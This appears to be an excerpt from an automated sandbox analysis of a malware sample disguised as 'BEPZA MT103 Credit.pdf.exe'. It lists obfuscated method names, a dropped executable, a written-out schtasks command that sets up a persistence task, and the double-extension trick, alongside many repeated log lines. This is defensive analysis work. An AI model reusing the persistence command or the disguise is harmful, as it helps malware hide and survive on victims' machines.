Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, gPDJgDfUH82JajhHPO.cs High entropy of concatenated method names: 'fA8CvTHTbN', 'sjeCSUoU6V', 'pYbCLK74xT', 'G5pCtAtjcV', 'Ik4Cs9fg6b', 'kFRCjSR6PS', 'MQMhYmTMfh56qVbmhF', 'ebhyLTRtnZwbXUyRDG', 'h5rCCspKTv', 'QUVCoD4KZ1'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, wPcggfXarRGHwfdcKr.cs High entropy of concatenated method names: 'cNGDldGHbn', 'kG5D2BIY8n', 'DXjD41oP6X', 'zqnDuV3GY2', 'MPkDKqUnuC', 'TyGD0JO2uo', 'iFqDHbuvcZ', 'JbgDPdJuDx', 'VpQDANrMdk', 'dBQDZhwIIf'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, cLTVWI0Z4SQaHe7mK7.cs High entropy of concatenated method names: 'o49OMsP0W6', 'q2wOG0bYG7', 'qUCOqKeDlE', 'ToString', 'SpMOreWjqu', 'vPFOwyaXa3', 'WAEphH3rae6gGSOtqaq', 'sfwHZk3Yl4o8sAEugW8', 'X5pQ3X3cR1Csdm462iN'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, U93FXVSN9l2hPxLFaG.cs High entropy of concatenated method names: 'vh7ohprC21', 'pyFoJSOpYV', 'AvYoEsRkwS', 'oLLo6KDV3Q', 'QWaoNxmVPu', 'DEkoOR9Xfn', 'r4TovSu3G4', 'g3NoSq1aMH', 'OLyo8I7W8q', 'NBXoLbHp5O'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, HTZDqbGRORNdQopHe8.cs High entropy of concatenated method names: 'Dn55L5qPHc', 'm555t4vfsX', 'ToString', 'oFQ5JLygv7', 'krw5ENsvuB', 'FM456XlECL', 'gtj5NbcDrg', 'OqK5OGdnWV', 'dk65vrp1oW', 'qfw5STs9R3'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, hceRmTCWrN6wH7cI3N6.cs High entropy of concatenated method names: 'ToString', 'VNk9i7mtQg', 'cXG9T7AC7p', 'mXS9UBXGZR', 'WKj9lNBOkb', 'vFw92UhgK3', 'G4m94VCPT4', 'AJy9uHxK8G', 'Ymfkere5gwDXkBE2UpZ', 'DrMvCEe15sFUN7tVkfH'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, s8Y1y0Mi9WcOG0mTH1.cs High entropy of concatenated method names: 'ToString', 'Hn8jmmFnHG', 'fjGj2VT9lN', 'osFj459dNP', 'mu1juJe4fi', 'QtQjKRSaO2', 'Ycxj0Wn1nA', 'mwrjHLZEi2', 'J7VjP7bjQ4', 'gACjArprPG'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, uE5RalB2ln8b0n8Wbv.cs High entropy of concatenated method names: 'MxOR6h7bi6', 'dAmRNVqlVu', 'uhZROKdbCF', 'UdSRvBB3ch', 'W3sRD83s60', 'iGJRSHAoGN', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, cvRFX3AvwS2op08hje.cs High entropy of concatenated method names: 'tExvkeX4kZ', 'sCavg8G8oI', 'Ge3vn7OYYn', 'OARvdB0bD6', 'STSvId92KY', 'Jtcvba3Iq9', 'OYwvyjm3pp', 'X2xviv4PkG', 'hWNvT8Z7nW', 'XLMvUodxbo'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, OFmwd81ndwdfW0m9Y4.cs High entropy of concatenated method names: 'BFtsZ5kkLc', 'L5gsed5Su4', 'fAhs1iuaPx', 'tlqsVHx8t0', 'JVes2CW44d', 'O40s45t9m7', 'iEKsumsGYg', 'oGesKci1to', 'm0ds0f0VSZ', 'DgTsHaHAFp'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, mjcVcEUwoMYpYuk49f.cs High entropy of concatenated method names: 'ct9NINHm7p', 'Lj0NyHDt9p', 'mT664i5LPb', 'IOP6uD7Twi', 'brA6KY2hQA', 'cdZ60weyNy', 'W5f6HvEhsk', 'yS26PWDrYQ', 'YdC6AOFA6d', 'YgF6Z0ed5O'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, Cw8mvfWKUJllqoD5N5.cs High entropy of concatenated method names: 'pYlnu46qq', 'EsbdMnlnl', 'kTmbicCx9', 'pGRyinob4', 'j4rTutCpv', 'l9bUDr4fm', 'mXMnlXDRHw2OHarK6k', 'DIit5t8Ry6hgFT2umZ', 'CJGclZ3S3', 'EiiR6Ylyy'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, IeGoKjTYbK74xTl5pA.cs High entropy of concatenated method names: 'wAn6dKQqj3', 'Huy6bk8Tv3', 'Im66i5AqpJ', 'RF86TnSoHd', 'whX6sDrdHP', 'fky6jSx93A', 'hQj654qH0t', 't0U6c0oDLL', 'QLC6DPS3jP', 'AX76RI3VLp'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, I7NNcAw8mv7vF81q9x.cs High entropy of concatenated method names: 'lM7Dsw39Xm', 'dvRD5BfwRv', 'EpSDDc2Ofg', 'BVfD93DDvX', 'PsKDpIFPx2', 'AZhD3cupQX', 'Dispose', 'dvjcJTnDwE', 'njQcEJ6s5H', 'Emcc6AG6s4'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.3286090.0.raw.unpack, P3eh8af2o4VTkSD0Y3.cs High entropy of concatenated method names: 'Dispose', 'P3efh8a2o', 'yH8LT4C6bmLeWc8YL5', 'L4Ca6Xd2uZ8fu7tskX', 'DguxHGFPrqLRK6Jgbs', 'rGmoViKuA1CYkAIaDT', 'pSCfTfOip17KqF4YlD', 'FPnfDwDcQAmPdvY5g0', 'tTY1xtxACVStGqjdTk', 'B1WwFvRAyy9IRNc19V'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.3286090.0.raw.unpack, dTuvtD1DdyQbwj9dR3.cs High entropy of concatenated method names: 'KYGvAvhTF', 'JFn7SRQet', 'ax2QgSfgc', 'g5OeQ68r3', 'a6IZjF0TE', 'UeGcOh08y', 'PKxX9EuHD', 'OcPJIHTlp', 'Ym7kCXKit', 'LsoLtyUhZ'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.3286090.0.raw.unpack, ihTFxFFnSRQetgx2gS.cs High entropy of concatenated method names: 'ISrkpyii4tSUs', 'b50WjUTaChgUDI2NEVw', 'gQERmsTu2tA2TFSBlH8', 'rFnpM5TnkllvYULeG2c', 'vcFCwhTvUgN9tUBDaUO', 'frROXdT0dSL2FIpOj8j', 'zOHiqMTZkx59a1xMwqr'
Source: 11.2.YEGIgzyAhkvT.exe.2f56078.0.raw.unpack, P3eh8af2o4VTkSD0Y3.cs High entropy of concatenated method names: 'Dispose', 'P3efh8a2o', 'yH8LT4C6bmLeWc8YL5', 'L4Ca6Xd2uZ8fu7tskX', 'DguxHGFPrqLRK6Jgbs', 'rGmoViKuA1CYkAIaDT', 'pSCfTfOip17KqF4YlD', 'FPnfDwDcQAmPdvY5g0', 'tTY1xtxACVStGqjdTk', 'B1WwFvRAyy9IRNc19V'
Source: 11.2.YEGIgzyAhkvT.exe.2f56078.0.raw.unpack, dTuvtD1DdyQbwj9dR3.cs High entropy of concatenated method names: 'KYGvAvhTF', 'JFn7SRQet', 'ax2QgSfgc', 'g5OeQ68r3', 'a6IZjF0TE', 'UeGcOh08y', 'PKxX9EuHD', 'OcPJIHTlp', 'Ym7kCXKit', 'LsoLtyUhZ'
Source: 11.2.YEGIgzyAhkvT.exe.2f56078.0.raw.unpack, ihTFxFFnSRQetgx2gS.cs High entropy of concatenated method names: 'ISrkpyii4tSUs', 'b50WjUTaChgUDI2NEVw', 'gQERmsTu2tA2TFSBlH8', 'rFnpM5TnkllvYULeG2c', 'vcFCwhTvUgN9tUBDaUO', 'frROXdT0dSL2FIpOj8j', 'zOHiqMTZkx59a1xMwqr'
Drops PE files
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe File created: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp3E23.tmp"

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Uses an obfuscated file name to hide its real file extension (double extension)
Source: Possible double extension: pdf.exe Static PE information: BEPZA MT103 Credit.pdf.exe
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
